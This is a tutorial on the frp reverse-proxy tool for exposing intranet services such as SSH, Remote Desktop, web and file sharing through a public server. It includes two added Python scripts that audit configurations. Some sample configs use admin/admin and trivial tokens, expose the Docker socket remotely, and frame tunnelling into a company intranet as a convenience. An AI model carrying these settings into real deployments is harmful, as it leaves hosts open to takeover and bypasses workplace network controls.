Intranet penetration – FRP, termite

  • Chinese documentation: https://github.com/fatedier/frp/blob/dev/README_zh.md
  • Phone + frp intranet penetration, building a server you carry with you: https://blog.csdn.net/sinat_27938829/article/details/73604722
  • Soft router via the frp plugin bundled with OpenWrt: https://zhuanlan.zhihu.com/p/367894569
  • Hosting a personal website on a phone (KSWEB + Termux + frp intranet penetration): https://www.jianshu.com/p/9981d27c0350
  • Intranet/extranet interconnection (Ngrok, DingTalk, Oray Peanut Shell, frp): https://www.it235.com/实用工具/内网穿透/pierce.html

Intranet penetration tool, FRP: https://mp.weixin.qq.com/s?__biz=MzI3MTI2NzkxMA==&mid=2247485670&idx=1&sn=df62f2df93f112a7bc0b8d7e843bbc16

Keywords: intranet penetration, domain name mapping

Intranet penetration

What is intranet penetration?

Intranet penetration, also called NAT traversal, is a networking term. In plain words, it means that your personal computer at home can be reached directly by people on the public internet; for example, while at the office you can reach your home computer directly without a remote-access tool. Intranet penetration exposes a port on the local network to the public network, and through the public network you can then reach the service behind that exposed port on the LAN.

Intranet penetration is usually achieved with port mapping on the router. But not everyone has permission to access and configure the router, and the network may have several levels of routers, in which case port mapping is not possible.

Normally our personal computers cannot be reached by others (unless you have a fixed IP!), and fixed IPs are scarce now: carriers no longer hand them out casually, and applying for one as an individual is hard.

Why is intranet penetration needed? For an individual, the reasons are: first, convenient access to the company intranet without remote-access tools, which are a hassle; second, exposing applications on a personal computer to the internet.


1. Introduction to frp

FRP stands for Fast Reverse Proxy. frp is an open-source, simple, easy-to-use, high-performance intranet penetration and reverse proxy tool written in Go; it supports tcp, udp, http, https and other protocols. The project site is https://github.com/fatedier/frp

Using frp has the following advantages:

  • 1. Use a machine behind a NAT or firewall to provide HTTP or HTTPS services to the public internet.
  • 2. For HTTP and HTTPS services it supports name-based virtual hosting and custom domain binding, so multiple domains can share one port 80.
  • 3. Use a machine behind a NAT or firewall to provide TCP and UDP services to the public internet, for example reaching a host on the company intranet by SSH from home.

How frp works

  • The server runs and listens on a main port, waiting for clients to connect;
  • The client connects to the server's main port and tells the server which port to listen on and what kind of forwarding to do;
  • The server forks a new process that listens on the port the client specified;
  • An external user connects to the port the client specified, and the server forwards the data to the client over the client's connection;
  • The client process then forwards the data to the local service, which is how an intranet service is exposed externally.

2. Configuration tutorial

To set up frp penetration you must first have a server with a public IP (that is, reachable from the internet). If you don't have one, there is no need to read the rest of the tutorial.

The configuration tutorial is divided into two parts:

  • 1: Server-side (public server) configuration; the server is usually deployed on a machine with a public IP.
  • 2: Client-side (intranet server) configuration; the client is usually deployed on the machine that runs the intranet service to be exposed.

Server-side (public server) configuration

Linux version:

Download: https://github.com/fatedier/frp/releases


After downloading, upload the archive to the server; this puts it in the server's home directory:

scp frp_0.39.0_linux_amd64.tar.gz <username>@<server ip>:~/

Or download it on the server directly:

wget https://github.com/fatedier/frp/releases/download/v0.39.0/frp_0.39.0_linux_amd64.tar.gz

If that feels slow, mwget can be used instead:

mwget https://github.com/fatedier/frp/releases/download/v0.39.0/frp_0.39.0_linux_amd64.tar.gz

Extract the frp archive:

tar -zxvf frp_0.39.0_linux_amd64.tar.gz


The files in the frp directory fall into two groups:

  • Files beginning with frpc are for the client.
  • Files beginning with frps are for the server.
  • Files ending in .ini are frp's configuration files, the ones that need to be modified.

Contents of frps_full.ini:

# [common] is integral section
[common]
# A literal address or host name for IPv6 must be enclosed
# in square brackets, as in "[::1]:80", "[ipv6-host]:http" or "[ipv6-host%zone]:80"
# For single "bind_addr" field, no need square brackets, like "bind_addr = ::".
bind_addr = 0.0.0.0
bind_port = 7000
# udp port to help make udp hole to penetrate nat
bind_udp_port = 7001
# udp port used for kcp protocol, it can be same with 'bind_port'
# if not set, kcp is disabled in frps
kcp_bind_port = 7000
# specify which address proxy will listen for, default value is same with bind_addr
# proxy_bind_addr = 127.0.0.1
# if you want to support virtual host, you must set the http port for listening (optional)
# Note: http port and https port can be same with bind_port
vhost_http_port = 80
vhost_https_port = 443
# response header timeout(seconds) for vhost http server, default is 60s
# vhost_http_timeout = 60
# tcpmux_httpconnect_port specifies the port that the server listens for TCP
# HTTP CONNECT requests. If the value is 0, the server will not multiplex TCP
# requests on one single port. If it's not - it will listen on this value for
# HTTP CONNECT requests. By default, this value is 0.
# tcpmux_httpconnect_port = 1337
# set dashboard_addr and dashboard_port to view dashboard of frps
# dashboard_addr's default value is same with bind_addr
# dashboard is available only if dashboard_port is set
dashboard_addr = 0.0.0.0
dashboard_port = 7500
# dashboard user and passwd for basic auth protect
dashboard_user = admin
dashboard_pwd = admin
# enable_prometheus will export prometheus metrics on {dashboard_addr}:{dashboard_port} in /metrics api.
enable_prometheus = true
# dashboard assets directory(only for debug mode)
# assets_dir = ./static
# console or real logFile path like ./frps.log
log_file = ./frps.log
# trace, debug, info, warn, error
log_level = info
log_max_days = 3
# disable log colors when log_file is console, default is false
disable_log_color = false
# DetailedErrorsToClient defines whether to send the specific error (with debug info) to frpc. By default, this value is true.
detailed_errors_to_client = true
# authentication_method specifies what authentication method to use authenticate frpc with frps.
# If "token" is specified - token will be read into login message.
# If "oidc" is specified - OIDC (Open ID Connect) token will be issued using OIDC settings. By default, this value is "token".
authentication_method = token
# authenticate_heartbeats specifies whether to include authentication token in heartbeats sent to frps. By default, this value is false.
authenticate_heartbeats = false
# AuthenticateNewWorkConns specifies whether to include authentication token in new work connections sent to frps. By default, this value is false.
authenticate_new_work_conns = false
# auth token
token = 12345678
# oidc_issuer specifies the issuer to verify OIDC tokens with.
# By default, this value is "".
oidc_issuer =
# oidc_audience specifies the audience OIDC tokens should contain when validated.
# By default, this value is "".
oidc_audience =
# oidc_skip_expiry_check specifies whether to skip checking if the OIDC token is expired.
# By default, this value is false.
oidc_skip_expiry_check = false
# oidc_skip_issuer_check specifies whether to skip checking if the OIDC token's issuer claim matches the issuer specified in OidcIssuer.
# By default, this value is false.
oidc_skip_issuer_check = false
# heartbeat configure, it's not recommended to modify the default value
# the default value of heartbeat_timeout is 90. Set negative value to disable it.
# heartbeat_timeout = 90
# user_conn_timeout configure, it's not recommended to modify the default value
# the default value of user_conn_timeout is 10
# user_conn_timeout = 10
# only allow frpc to bind ports you list, if you set nothing, there won't be any limit
allow_ports = 2000-3000,3001,3003,4000-50000
# pool_count in each proxy will change to max_pool_count if they exceed the maximum value
max_pool_count = 5
# max ports can be used for each client, default value is 0 means no limit
max_ports_per_client = 0
# tls_only specifies whether to only accept TLS-encrypted connections. By default, the value is false.
tls_only = false
# tls_cert_file = server.crt
# tls_key_file = server.key
# tls_trusted_ca_file = ca.crt
# if subdomain_host is not empty, you can set subdomain when type is http or https in frpc's configure file
# when subdomain is test, the host used by routing is test.frps.com
subdomain_host = frps.com
# if tcp stream multiplexing is used, default is true
tcp_mux = true
# specify keep alive interval for tcp mux.
# only valid if tcp_mux is true.
# tcp_mux_keepalive_interval = 60
# custom 404 page for HTTP requests
# custom_404_page = /path/to/404.html
# specify udp packet size, unit is byte. If not set, the default value is 1500.
# This parameter should be same between client and server.
# It affects the udp and sudp proxy.
udp_packet_size = 1500
[plugin.user-manager]
addr = 127.0.0.1:9000
path = /handler
ops = Login
[plugin.port-manager]
addr = 127.0.0.1:9001
path = /handler
ops = NewProxy

Contents of frpc_full.ini:

# [common] is integral section
[common]
# A literal address or host name for IPv6 must be enclosed
# in square brackets, as in "[::1]:80", "[ipv6-host]:http" or "[ipv6-host%zone]:80"
# For single "server_addr" field, no need square brackets, like "server_addr = ::".
server_addr = 0.0.0.0
server_port = 7000
# if you want to connect frps by http proxy or socks5 proxy or ntlm proxy, you can set http_proxy here or in global environment variables
# it only works when protocol is tcp
# http_proxy = http://user:passwd@192.168.1.128:8080
# http_proxy = socks5://user:passwd@192.168.1.128:1080
# http_proxy = ntlm://user:passwd@192.168.1.128:2080
# console or real logFile path like ./frpc.log
log_file = ./frpc.log
# trace, debug, info, warn, error
log_level = info
log_max_days = 3
# disable log colors when log_file is console, default is false
disable_log_color = false
# for authentication, should be same as your frps.ini
# authenticate_heartbeats specifies whether to include authentication token in heartbeats sent to frps. By default, this value is false.
authenticate_heartbeats = false
# authenticate_new_work_conns specifies whether to include authentication token in new work connections sent to frps. By default, this value is false.
authenticate_new_work_conns = false
# auth token
token = 12345678
# oidc_client_id specifies the client ID to use to get a token in OIDC authentication if AuthenticationMethod == "oidc".
# By default, this value is "".
oidc_client_id =
# oidc_client_secret specifies the client secret to use to get a token in OIDC authentication if AuthenticationMethod == "oidc".
# By default, this value is "".
oidc_client_secret =
# oidc_audience specifies the audience of the token in OIDC authentication if AuthenticationMethod == "oidc". By default, this value is "".
oidc_audience =
# oidc_token_endpoint_url specifies the URL which implements OIDC Token Endpoint.
# It will be used to get an OIDC token if AuthenticationMethod == "oidc". By default, this value is "".
oidc_token_endpoint_url =
# set admin address for control frpc's action by http api such as reload
admin_addr = 127.0.0.1
admin_port = 7400
admin_user = admin
admin_pwd = admin
# Admin assets directory. By default, these assets are bundled with frpc.
# assets_dir = ./static
# connections will be established in advance, default value is zero
pool_count = 5
# if tcp stream multiplexing is used, default is true, it must be same with frps
tcp_mux = true
# specify keep alive interval for tcp mux.
# only valid if tcp_mux is true.
# tcp_mux_keepalive_interval = 60
# your proxy name will be changed to {user}.{proxy}
user = your_name
# decide if exit program when first login failed, otherwise continuous relogin to frps
# default is true
login_fail_exit = true
# communication protocol used to connect to server
# now it supports tcp, kcp and websocket, default is tcp
protocol = tcp
# set client binding ip when connect server, default is empty.
# only when protocol = tcp or websocket, the value will be used.
connect_server_local_ip = 0.0.0.0
# if tls_enable is true, frpc will connect frps by tls
tls_enable = true
# tls_cert_file = client.crt
# tls_key_file = client.key
# tls_trusted_ca_file = ca.crt
# tls_server_name = example.com
# specify a dns server, so frpc will use this instead of default one
# dns_server = 8.8.8.8
# proxy names you want to start separated by ','
# default is empty, means all proxies
# start = ssh,dns
# heartbeat configure, it's not recommended to modify the default value
# The default value of heartbeat_interval is 10 and heartbeat_timeout is 90. Set negative value
# to disable it.
# heartbeat_interval = 30
# heartbeat_timeout = 90
# additional meta info for client
meta_var1 = 123
meta_var2 = 234
# specify udp packet size, unit is byte. If not set, the default value is 1500.
# This parameter should be same between client and server.
# It affects the udp and sudp proxy.
udp_packet_size = 1500
# include other config files for proxies.
# includes = ./confd/*.ini
# By default, frpc will connect frps with first custom byte if tls is enabled.
# If DisableCustomTLSFirstByte is true, frpc will not send that custom byte.
disable_custom_tls_first_byte = false
# 'ssh' is the unique proxy name
# if user in [common] section is not empty, it will be changed to {user}.{proxy} such as 'your_name.ssh'
[ssh]
# tcp | udp | http | https | stcp | xtcp, default is tcp
type = tcp
local_ip = 127.0.0.1
local_port = 22
# limit bandwidth for this proxy, unit is KB and MB
bandwidth_limit = 1MB
# true or false, if true, messages between frps and frpc will be encrypted, default is false
use_encryption = false
# if true, message will be compressed
use_compression = false
# remote port listen by frps
remote_port = 6001
# frps will load balancing connections for proxies in same group
group = test_group
# group should have same group key
group_key = 123456
# enable health check for the backend service, it support 'tcp' and 'http' now
# frpc will connect local service's port to detect it's healthy status
health_check_type = tcp
# health check connection timeout
health_check_timeout_s = 3
# if continuous failed in 3 times, the proxy will be removed from frps
health_check_max_failed = 3
# every 10 seconds will do a health check
health_check_interval_s = 10
# additional meta info for each proxy
meta_var1 = 123
meta_var2 = 234
[ssh_random]
type = tcp
local_ip = 127.0.0.1
local_port = 22
# if remote_port is 0, frps will assign a random port for you
remote_port = 0
# if you want to expose multiple ports, add 'range:' prefix to the section name
# frpc will generate multiple proxies such as 'tcp_port_6010', 'tcp_port_6011' and so on.
[range:tcp_port]
type = tcp
local_ip = 127.0.0.1
local_port = 6010-6020,6022,6024-6028
remote_port = 6010-6020,6022,6024-6028
use_encryption = false
use_compression = false
[dns]
type = udp
local_ip = 114.114.114.114
local_port = 53
remote_port = 6002
use_encryption = false
use_compression = false
[range:udp_port]
type = udp
local_ip = 127.0.0.1
local_port = 6010-6020
remote_port = 6010-6020
use_encryption = false
use_compression = false
# Resolve your domain names to [server_addr] so you can use http://web01.yourdomain.com to browse web01 and http://web02.yourdomain.com to browse web02
[web01]
type = http
local_ip = 127.0.0.1
local_port = 80
use_encryption = false
use_compression = true
# http username and password are safety certification for http protocol
# if not set, you can access this custom_domains without certification
http_user = admin
http_pwd = admin
# if domain for frps is frps.com, then you can access [web01] proxy by URL http://web01.frps.com
subdomain = web01
custom_domains = web01.yourdomain.com
# locations is only available for http type
locations = /,/pic
host_header_rewrite = example.com
# params with prefix "header_" will be used to update http request headers
header_X-From-Where = frp
health_check_type = http
# frpc will send a GET http request '/status' to local http service
# http service is alive when it return 2xx http response code
health_check_url = /status
health_check_interval_s = 10
health_check_max_failed = 3
health_check_timeout_s = 3
[web02]
type = https
local_ip = 127.0.0.1
local_port = 8000
use_encryption = false
use_compression = false
subdomain = web01
custom_domains = web02.yourdomain.com
# if not empty, frpc will use proxy protocol to transfer connection info to your local service
# v1 or v2 or empty
proxy_protocol_version = v2
[plugin_unix_domain_socket]
type = tcp
remote_port = 6003
# if plugin is defined, local_ip and local_port is useless
# plugin will handle connections got from frps
plugin = unix_domain_socket
# params with prefix "plugin_" that plugin needed
plugin_unix_path = /var/run/docker.sock
[plugin_http_proxy]
type = tcp
remote_port = 6004
plugin = http_proxy
plugin_http_user = abc
plugin_http_passwd = abc
[plugin_socks5]
type = tcp
remote_port = 6005
plugin = socks5
plugin_user = abc
plugin_passwd = abc
[plugin_static_file]
type = tcp
remote_port = 6006
plugin = static_file
plugin_local_path = /var/www/blog
plugin_strip_prefix = static
plugin_http_user = abc
plugin_http_passwd = abc
[plugin_https2http]
type = https
custom_domains = test.yourdomain.com
plugin = https2http
plugin_local_addr = 127.0.0.1:80
plugin_crt_path = ./server.crt
plugin_key_path = ./server.key
plugin_host_header_rewrite = 127.0.0.1
plugin_header_X-From-Where = frp
[plugin_https2https]
type = https
custom_domains = test.yourdomain.com
plugin = https2https
plugin_local_addr = 127.0.0.1:443
plugin_crt_path = ./server.crt
plugin_key_path = ./server.key
plugin_host_header_rewrite = 127.0.0.1
plugin_header_X-From-Where = frp
[plugin_http2https]
type = http
custom_domains = test.yourdomain.com
plugin = http2https
plugin_local_addr = 127.0.0.1:443
plugin_host_header_rewrite = 127.0.0.1
plugin_header_X-From-Where = frp
[secret_tcp]
# If the type is secret tcp, remote_port is useless
# Who want to connect local port should deploy another frpc with stcp proxy and role is visitor
type = stcp
# sk used for authentication for visitors
sk = abcdefg
local_ip = 127.0.0.1
local_port = 22
use_encryption = false
use_compression = false
# user of frpc should be same in both stcp server and stcp visitor
[secret_tcp_visitor]
# frpc role visitor -> frps -> frpc role server
role = visitor
type = stcp
# the server name you want to visitor
server_name = secret_tcp
sk = abcdefg
# connect this address to visitor stcp server
bind_addr = 127.0.0.1
bind_port = 9000
use_encryption = false
use_compression = false
[p2p_tcp]
type = xtcp
sk = abcdefg
local_ip = 127.0.0.1
local_port = 22
use_encryption = false
use_compression = false
[p2p_tcp_visitor]
role = visitor
type = xtcp
server_name = p2p_tcp
sk = abcdefg
bind_addr = 127.0.0.1
bind_port = 9001
use_encryption = false
use_compression = false
[tcpmuxhttpconnect]
type = tcpmux
multiplexer = httpconnect
local_ip = 127.0.0.1
local_port = 10701
custom_domains = tunnel1

Enter the extracted directory and open the configuration file with vi frps.ini; change its contents to the following:

[common]
bind_port = 7000            # port frps listens on; default 7000, can be changed
token = mytoken_12345       # auth token; make it more complex; the client uses the same token later
dashboard_port = 7500       # frps dashboard port; change to your needs
dashboard_user = admin      # dashboard username and password; change them to your own
dashboard_pwd = admin
enable_prometheus = true

# frp log settings
log_file = /var/log/frps.log
log_level = info
log_max_days = 3

  • bind_port is the port on which the client and server connect; the client must be set to the same value (required)
  • token is the passphrase used for the client-server connection; the client must be set to the same value (required)
  • dashboard_port is the port of the server dashboard, where frps run-time information can be viewed (optional)
  • dashboard_user and dashboard_pwd are the username and password used to log in to the dashboard page (optional)
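The server configuration above is what most people deploy unchanged, and several of its defaults matter once frps sits on a public IP. The following is an added example (not frp's own code, and not part of this tutorial) that reads an frps.ini [common] section with Python's standard configparser and reports the settings a defender would change before exposing the server: a missing or short token, the dashboard left on admin/admin or bound to every interface, no allow_ports limit, no per-client port limit, and tls_only left off. Both sample configurations are constructed for this example; the weak one repeats the tutorial's values, and the hardened one uses placeholder secrets.

```python
"""Audit an frps.ini [common] section for settings that weaken a public frps.

Added example, not frp's own code. Both sample configurations are
constructed; the token and password in the hardened one are placeholders.
"""
import configparser

# Constructed sample: the tutorial's frps.ini as written above.
WEAK_FRPS_INI = """
[common]
bind_port = 7000
token = mytoken_12345
dashboard_port = 7500
dashboard_user = admin
dashboard_pwd = admin
enable_prometheus = true
"""

# Constructed sample: the same service with the settings hardened.
HARDENED_FRPS_INI = """
[common]
bind_port = 7000
token = 9f3c1a7e6b2d4c8a0e5f7b1c3d9a2e4f
dashboard_addr = 127.0.0.1
dashboard_port = 7500
dashboard_user = frpadmin
dashboard_pwd = Tq7-vR2-mL9p-Xz4Q
allow_ports = 6000-6100
max_ports_per_client = 5
tls_only = true
"""


def parse_frps(text):
    """Parse frps-style ini text; '#' starts both full-line and inline comments."""
    cp = configparser.ConfigParser(inline_comment_prefixes=("#", ";"),
                                   interpolation=None)
    cp.read_string(text)
    return cp


def audit_frps(text):
    """Return the sorted list of finding codes for one frps.ini."""
    common = parse_frps(text)["common"]
    findings = []

    token = common.get("token", "").strip()
    if not token:
        findings.append("no-token")            # any frpc can register proxies
    elif len(token) < 16:
        findings.append("short-token")         # guessable shared secret

    if "dashboard_port" in common:
        if common.get("dashboard_pwd", "") in ("", "admin"):
            findings.append("default-dashboard-password")
        # dashboard_addr defaults to bind_addr, which itself defaults to 0.0.0.0
        listen = common.get("dashboard_addr", common.get("bind_addr", "0.0.0.0"))
        if listen == "0.0.0.0":
            findings.append("dashboard-on-all-interfaces")

    if not common.get("allow_ports", "").strip():
        findings.append("no-allow-ports")      # clients may bind any remote_port

    if common.get("max_ports_per_client", "0").strip() == "0":
        findings.append("unlimited-ports-per-client")

    if common.get("tls_only", "false").strip().lower() != "true":
        findings.append("plaintext-control-allowed")

    return sorted(findings)


if __name__ == "__main__":
    for label, text in (("weak", WEAK_FRPS_INI), ("hardened", HARDENED_FRPS_INI)):
        print(label, audit_frps(text) or "no findings")
```

Run it against a real frps.ini by reading the file into a string and passing it to audit_frps; an empty list means none of the listed weaknesses is present. The dashboard check treats an unset dashboard_addr as 0.0.0.0 because, as the full config above notes, it defaults to bind_addr.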


Start the frp service

sudo mkdir -p /etc/frp
sudo cp frps.ini /etc/frp
sudo cp frps /usr/bin
sudo cp systemd/frps.service /usr/lib/systemd/system/
sudo systemctl enable frps
sudo systemctl start frps

If the above commands run in sequence without any error, the service started successfully.

Open firewall ports

# add the listening port
sudo firewall-cmd --permanent --add-port=7000/tcp
# add the dashboard port
sudo firewall-cmd --permanent --add-port=7500/tcp
sudo firewall-cmd --reload

Note:

  • 1: On Ubuntu or CentOS 6, use ufw / iptables to open the ports instead;
  • 2: Ports 7000 and 7500 correspond to bind_port and dashboard_port in frps.ini

Verify that the server started successfully

Visit http://<server IP>:<dashboard port> and enter the username and password to view the connection status, for example http://62.244.114.4:7500/. The username and password are dashboard_user and dashboard_pwd from frps.ini. After logging in, the dashboard page is shown.


Client-side (intranet server) configuration

Copy the files beginning with frpc to the intranet server (the server whose port is to be exposed to the public network).


Open the configuration file: vi frpc.ini (note: not frps.ini)

Change the file contents to the following:

# client configuration
[common]
server_addr = <server ip>
server_port = 7000     # same as bind_port in frps.ini
token = 52010          # same as token in frps.ini

# ssh service
[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000     # your choice; used later when connecting over ssh

[ssh2]                 # different clients need different names
type = tcp
local_ip = 127.0.0.1
local_port = 3389      # SSH uses port 22; Windows uses 3389 for Remote Desktop
remote_port = 6006     # the port appended to the server IP (x.x.x.x:6000 style) to reach the forwarded intranet machine

[rdb]
type = tcp
local_ip = 127.0.0.1
local_port = 3389
remote_port = 6000

# http service, usable for mini-program development, remote debugging and so on; omit it if not needed
[web]
type = http
local_ip = 127.0.0.1
local_port = 8080
subdomain = test.hijk.pw     # web domain
remote_port = <remote server port of your choice, e.g. 8080>

  • server_addr is the server's public IP (required)
  • server_port (bind_port on the server side) is the port on which the client and server connect; the server must be set to the same value (required)
  • token is the passphrase used for the client-server connection; the server must be set to the same value (required)
  • [rdb] is a rule name and can be chosen freely
  • type is the forwarding protocol type
  • local_port is the port of the local application; 3389 in this example is the default Remote Desktop port
  • remote_port is the port this rule opens on the server side; on the Windows 10 computer at the company, type mstsc to bring up Remote Desktop Connection and enter the server IP plus remote_port to reach the home computer

Note: names such as [ssh] must be globally unique; even with multiple clients a name can be used only once, so the others use [ssh2], [ssh3] and so on. In other words, when configuring several clients, change [ssh] in the other clients to [ssh2], [ssh3], etc., and change remote_port as well, e.g. to 6002, 6003.
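The note above describes two registration failures that only show up when the second client starts: a proxy name already taken by another client, and a TCP remote_port already bound; frps additionally refuses any remote_port outside its allow_ports list (see the full server config). The following is an added example, not part of frp or of this tutorial, that checks several frpc.ini files against one frps.ini offline to find those clashes first. All configurations are constructed for the example; the client values repeat the tutorial's frpc.ini, and the allow_ports range is an assumption.

```python
"""Cross-check several frpc.ini files against one frps.ini before deploying.

Added example, not frp's own code. Every configuration below is constructed.
"""
import configparser

# Constructed sample frps.ini: only 6000-6010 may be bound by clients (assumed range).
FRPS_INI = """
[common]
bind_port = 7000
allow_ports = 6000-6010
"""

# Constructed sample clients, keyed by a label for the machine each runs on.
CLIENT_INIS = {
    "home": """
[common]
server_port = 7000
[ssh]
type = tcp
local_port = 22
remote_port = 6000
[ssh2]
type = tcp
local_port = 3389
remote_port = 6006
[rdb]
type = tcp
local_port = 3389
remote_port = 6000
""",
    "office": """
[common]
server_port = 7000
[ssh]
type = tcp
local_port = 22
remote_port = 6002
[rdb]
type = tcp
local_port = 3389
remote_port = 6020
[web]
type = http
local_port = 8080
custom_domains = www.youdomain.com
""",
}


def parse_ini(text):
    cp = configparser.ConfigParser(inline_comment_prefixes=("#", ";"),
                                   interpolation=None)
    cp.read_string(text)
    return cp


def parse_allow_ports(spec):
    """'2000-3000,3001' -> set of ports; an empty spec means no limit (None)."""
    spec = spec.strip()
    if not spec:
        return None
    allowed = set()
    for part in spec.split(","):
        lo, _, hi = part.strip().partition("-")
        allowed.update(range(int(lo), int(hi or lo) + 1))
    return allowed


def check_clients(frps_text, client_texts):
    """Return the list of problems frps would reject at registration time."""
    allowed = parse_allow_ports(parse_ini(frps_text)["common"].get("allow_ports", ""))
    problems = []
    seen_names = {}   # full proxy name -> client label that registered it first
    seen_ports = {}   # (type, remote_port) -> "label/[section]" that bound it first
    for label, text in client_texts.items():
        cp = parse_ini(text)
        user = cp["common"].get("user", "").strip()
        for section in cp.sections():
            if section == "common":
                continue
            # frpc prefixes proxy names with "{user}." when user is set in [common]
            name = f"{user}.{section}" if user else section
            if name in seen_names:
                problems.append(f"{label}/[{section}]: proxy name {name!r} already used by {seen_names[name]}")
            else:
                seen_names[name] = label
            ptype = cp[section].get("type", "tcp")
            port = cp[section].get("remote_port")
            if ptype not in ("tcp", "udp") or port is None or int(port) == 0:
                continue   # http/https route by domain; remote_port 0 is assigned by frps
            port = int(port)
            if allowed is not None and port not in allowed:
                problems.append(f"{label}/[{section}]: remote_port {port} is outside allow_ports")
            key = (ptype, port)
            if key in seen_ports:
                problems.append(f"{label}/[{section}]: {ptype} remote_port {port} already used by {seen_ports[key]}")
            else:
                seen_ports[key] = f"{label}/[{section}]"
    return problems


if __name__ == "__main__":
    for problem in check_clients(FRPS_INI, CLIENT_INIS):
        print(problem)
```

With the constructed inputs the check reports the [rdb] rule on the home client reusing port 6000, the office client reusing the names ssh and rdb, and the office [rdb] port 6020 falling outside allow_ports; the http [web] proxy is skipped because it is routed by domain rather than by remote_port.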

Open firewall ports

sudo firewall-cmd --permanent --add-port=6000/tcp
sudo firewall-cmd --permanent --add-port=8080/tcp
sudo firewall-cmd --reload

Start the client: ./frpc -c frpc.ini

Test whether penetration is configured successfully

Find another computer on a different network segment and run in a terminal: ssh <username>@<server ip> -p <port>

Be careful here: the IP and username are those of the server side, and the port is the remote_port from frpc.ini. If you log in successfully, then congratulations, you have learned how to configure intranet penetration with frpc!

3. frp applications

SSH remote access

Since the home computer above (the frp client) runs Windows 10, Remote Desktop on port 3389 is possible. For a Linux system, remote access software such as FinalShell or Xshell is used instead, so when installing the client on Linux, frpc.ini needs the following added:

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 7001

In FinalShell or Xshell, enter the Tencent Cloud server IP:7001 plus the Linux account password to get access.


Web service connection

If the home computer (frp client) runs a web service, for example Tomcat, the client configuration file frpc.ini needs the following:

[web]
type = http
local_ip = 127.0.0.1
local_port = 8080
custom_domains = www.youdomain.com

custom_domains sets the domain name and is required. www.youdomain.com can be bought in Tencent Cloud for as little as 5 yuan a year (Domain registration, My domains, the registered domain can be purchased). Then resolve the domain: bind the Tencent Cloud server IP to the custom domain, after which the Tencent Cloud server can be reached by entering the domain name directly, as with Baidu and www.baidu.com.

Then in the browser on the company computer enter www.youdomain.com:10080 (the 10080 here is the vhost_http_port set on the server) to view the web service started on the home computer (frp client).

Password-protected web service

Since all clients share the HTTP service port of one frp server, anyone who knows your domain name and URL can access the web service you deployed on the intranet. In some scenarios, however, you need to ensure that only a limited set of users can access it.

frp supports protecting your web service with HTTP Basic Auth, so that users need a username and password to access it. Enabling this mainly requires adding username and password settings to the frp client's configuration file.

vim frpc.ini

[web]
type = http
local_port = 80
custom_domains = mike.hi-linux.com
# username for authentication
http_user = abc
# password for authentication
http_pwd = abc

Now accessing the URL http://mike.hi-linux.com:8080 requires the configured username and password. This feature is currently limited to HTTP-type proxies.

HTTP penetration

HTTP penetration concerns the application-layer communication protocol, HTTP. Penetrating it makes it convenient to reach web applications on the intranet; for example, if I start Tomcat on an intranet machine, deploy a website there and want people on the internet to reach it, HTTP penetration is required.

Server side

[common]
bind_port = 7000
vhost_http_port = 80                 # use the server's port 80 for http traffic
vhost_https_port = 443               # use the server's port 443 for https traffic
privilege_token = token123456789     # frp authentication; the client must be configured with the same value to communicate

Client side

[common]
server_addr = <cloud server ip>
server_port = 7000
privilege_token = token123456789     # frp authentication

[web_http]
type = http                          # communication type is http
local_ip = 127.0.0.1
local_port = 8080
custom_domains = <second-level domain or public ip>

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000

For HTTP penetration both the server and client configuration files changed; let's focus on the client configuration. type = http: because the tunnel we want to create carries HTTP traffic, that is, it is used to reach the local web application. custom_domains = <second-level domain or public ip>: this is usually configured with a second-level domain, used to reach your penetration server by domain name; if you have no domain, the server's public IP works too, but then external access is possible by IP only. The effect is the same.

File access service

Add the following to frpc.ini on the home computer (frp client):

[my_static_file]
type = tcp
remote_port = 6001
plugin = static_file
plugin_local_path = E:\\temp
plugin_strip_prefix = static
plugin_http_user = abc
plugin_http_passwd = 123

  • plugin is the plugin to use
  • plugin_local_path is the file directory to expose
  • plugin_strip_prefix is the prefix carried in the access URL
  • plugin_http_user is the access account
  • plugin_http_passwd is the access password

In the browser on the company computer enter http://1.1.1.1:6001/static/ and type the account and password to view the files shared by the home computer, where 1.1.1.1 is the Tencent Cloud server IP.

Combined configuration

frp intranet penetration can use a domain name or an IP. Generally a domain name is easier to remember, so use a domain name if you have one and an IP only if you don't. Since web services generally use port 80, if port 80 is occupied by nginx or another web service, change to another port such as 8080, or use an nginx reverse proxy so that the frp server and nginx share port 80.

frp implements intranet penetration (a great tool when you have no public IP). Below, frps is the server side and frpc the client side.

1. frp configuration with your own domain name

# frps.ini server configuration
[common]
bind_addr = 0.0.0.0
bind_port = 7000
privilege_token = abcdefghijk
vhost_http_port = 80
vhost_https_port = 443

vhost_http_port = 80 and vhost_https_port = 443 use the server's port 80 for http and port 443 for https. The principle is the same as nginx: these two ports can be shared by multiple websites.

# frpc.ini client configuration
[common]
server_addr = <server IP>
server_port = 7000
privilege_token = abcdefghijk

[httpname]
type = http
local_port = 80
local_ip = 127.0.0.1
custom_domains = www.52help.net

[httpsname]
type = https
local_port = 443
local_ip = 127.0.0.1
custom_domains = 52help.net

Both domain names, www.52help.net and 52help.net, must exist, and in DNS the specified domains must be resolved to the IP of the frps server.

custom_domains = the domain name you have already resolved to the frps server IP; each penetrated service can be bound to its own domain for access, including tcp and udp protocols.

You can then reach the corresponding HTTP service through this custom domain.

2. IP only, no own domain name configured

If you don't have a domain name but still want to use frp to reach your HTTP service from the internet:

# frps.ini server configuration
[common]
bind_addr = 0.0.0.0
bind_port = 7000
privilege_token = abcdefghijk

# frpc.ini client configuration
[common]
server_addr = <server IP>
server_port = 7000
privilege_token = abcdefghijk

[httpname]
type = tcp
local_port = 80
local_ip = 127.0.0.1
remote_port = 8080

You can then reach the corresponding penetrated service through <server IP address>:8080.

Adding a custom second-level domain to web services

When several people share one frp server for web services at the same time, custom second-level domains make it more convenient to use.

Enable this feature by configuring the subdomain_host parameter in the frp server's configuration file. Afterwards, proxies of type http or https on the frp client can leave out custom_domains and configure a subdomain parameter instead.

Then you only need to resolve *.{subdomain_host} to the server where frps runs. Users can then specify their own second-level domain for their web service with subdomain and reach it through {subdomain}.{subdomain_host}.

First configure the subdomain_host parameter on the frp server:

$ vim frps.ini
[common]
subdomain_host = hi-linux.com

Next configure the subdomain parameter in the frp client configuration file:

$ vim frpc.ini
[web]
type = http
local_port = 80
subdomain = test

Then resolve the wildcard domain *.hi-linux.com to the public IP of the server where frps runs. After both frps and frpc have started successfully, the intranet web service is reachable via test.hi-linux.com.

